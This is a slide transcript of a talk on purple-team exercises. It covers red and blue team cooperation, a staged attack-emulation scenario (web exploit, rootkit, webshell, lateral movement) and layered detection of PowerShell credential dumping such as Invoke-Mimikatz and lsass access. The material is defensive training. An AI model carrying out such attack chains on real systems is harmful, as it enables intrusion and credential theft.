purple team 紅藍隊的相愛相殺deep dives the technique let attacker & defender sit...
TRANSCRIPT
奧義智慧 Proprietary and Confidential Information
Purple Team紅藍隊的相愛相殺
Who Am I
►Shang-De Jiang ( @SecurityThunder )►Cyber Security Researcher @ 奧義智慧
►Speaker of HITCON, Black Hat USA(2020)
►UCCU Hacker Co-Founder►Private Cyber Security Group in Taiwan
奧義智慧 @ MITRE ATT&CK Evaluation
CyCraft Takes Significant Alerting Lead in MITRE ATT&CK® Evaluations’ Latest Round
BAD PYRAMID
https://danielmiessler.com/blog/the-definition-green-team-how-different-red-team/
Maturity Level
Vuln ManagementPenetration
Testing
Blind/Internal
Red Team
In Person/
Continues
Purple Team
Ref: Bryson Bort (scythe)
The Team Conflict of Red&Blue
►Red Team (KPI: find security issue)
►Troublemaker
►Security flaw
►Impact blue team performance
►Blue Team (KPI: less security issue)
►Old-school
►Conservative
►Never patch the vuln
Credit: Robert Couse-Baker
Access Control
Security Monitoring
Incident Response
Help Desk
Exploit Development
Penetration test
Social Engineering
Vulnerability Scan
Purple Team: Improve Security Posture
The reason why you need purple team
►Improve MTTD (mean time to detect)
►Improve MTTR (mean time to respond)
►Benefit for organization security monitor maturity►No matter at what level.
►Guide to identify org's current gap
►Even organization has red team assessment
奧義智慧 Proprietary and Confidential Information
Build Your Purple Team
Preparation
►Objectives►Determine testing scope and target
►Blue & Red team member selection►Ensure that representatives from each aspect of the blue team are involved
►Red team need has experience
►Referee
►Communication bridge between attack&defense team
Planning - map your attack surface
The real threat behind the incident
https://www.inside.com.tw/article/20479-garmin-outage-ransomware-sources
Planning - design attack scenario
►Emulate the real incident experienced in the organization/industry
►Review historical red team exercise
►Improve attack complexity gradually1.Common tools, Penetration testing framework
2.Evasive the attack
3.Create own tools
奧義智慧 Proprietary and Confidential Information
ExecutionA dve r sar y Emu lat ion
CALDERA
►Automated adversary emulation
►End-to-End: start initial access until data exfiltration.
►Repeatable: improvement can be measured over time.
Playbook
APT3 APT29 Dogeza
https://attackevals.mitre.org https://attackevals.mitre.org
RoleSoftware and Environment
IP Address
Red Team
Kali 4.15.0, MS15-015
172.16.40.225
Blue Team
Xensor, CyCraft, CyberTotal
172.16.40.230172.16.40.231
Victim A
Linux Ubuntu 16.04172.16.40.232
Victim B
Windows Server 2012 R2
172.16.40.226
Victim C
Windows 10 (1607) English
172.16.40.227
Blue TeamRed Team
Win Desktop
VictimLinux
Linux Apache
Dogeza Playbook Scenario
Dogeza Red-Blue Team Step
►Part I – Setup & Linux Red Team Step
Procedure
1Blue Team then deploys software on Victim A, B and C
2Red Team use web exploit to attacks Victim A
3Red Team takes privilege escalation in Victim A
4Red Team implants forged ssh key for persistence
5Red Team installs a kernel rootkit and hides a process in Victim A
6Red Team constructs a tunnel to reach internal Victim B
Step
Procedure
8Red Team exploits Victim B via the tunnel to implant webshell (skip, duplicated as step 3)
9 Red Team launch webshell of Victim B
10Red Team obtains the privilege and credentials of Victim B
11 Red Team moves laterally to Victim C
12Red Team collects sensitive documents and deploys backdoor on Victim C
13 Blue Team generates investigation report
奧義智慧 Proprietary and Confidential Information
Review
Review testing result
►Roundtable meeting►Not just wait the final report
►Deep dives the technique
►Let attacker & defender sit together study the attack.
►Review finding and new plan►Open Q&A time for red&blue team. Share finding, detection ,mitigation plan.
Measure Performance
►Before ►After
Blue Team Evolution
Detect Target – PowerShell OS cred dumping• ATT&CK evaluation – APT29 step 6.C.1, PowerShell Dump OS credential
The attack method want to detect
►PowerShell download remote script
►OS Credential Dumping via PowerShell
Detect from command line10 1
Detect from process loaded library 0 2
Check PowerShell eventlog
• EventID : 4104
• EventID : 4103
0 3
Check called API
►PowerShell will call .net lib, if you
can hook all API then you know
PowerShell's behavior.
0 4
Stage 1 Stage 2 Stage 3 Stage 4
Process Cmd Param
Detect PowerShell with cmd-
line PowerShell invoke-
mimikatz
Loaded DLLsDetect powershell.exe has
loaded suspicious
credential dumping dll,
Crypt32.dll, User32.dll,
Advapi32.dll
Windows Event Log
Log windows event 4104,4103
API monitoring
Monitoring PowerShell
call OpenProcess access
lsass process memeory
AMSI
Stage 5
Data Sources Evolution
Using AMSI module log
every PowerShell event
0 1 0 2 0 3
Cred Access Protection
Use capabilities to prevent
successful credential access by
adversaries; including blocking
forms of credential dumping.
e.g. Credential Guard
Privileged Account ManagementManage the creation,
modification, use, and
permissions associated to
privileged accounts, including
SYSTEM and root.
Restrict PowerShell execution
policy to administrators.
Execution Prevention
Block execution of code on a
system through application
control, and/or script blocking.
e.g. AppLocker
Implement Mitigation
0 4
PowerShell Constrained Language
Permits all cmdlets and all
PowerShell language elements,
but it limits permitted types.
Ref: https://attack.mitre.org/https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_language_modes
KEY TAKEAWAYS
1. Have a purple team to make your security team work together
2. Purple team is not a replacement to red team
3. Security not just buy more product; The exercise is also important
4. Identify the security gap and do detection/mitigation
奧義智慧 Proprietary and Confidential Information
Q&A Time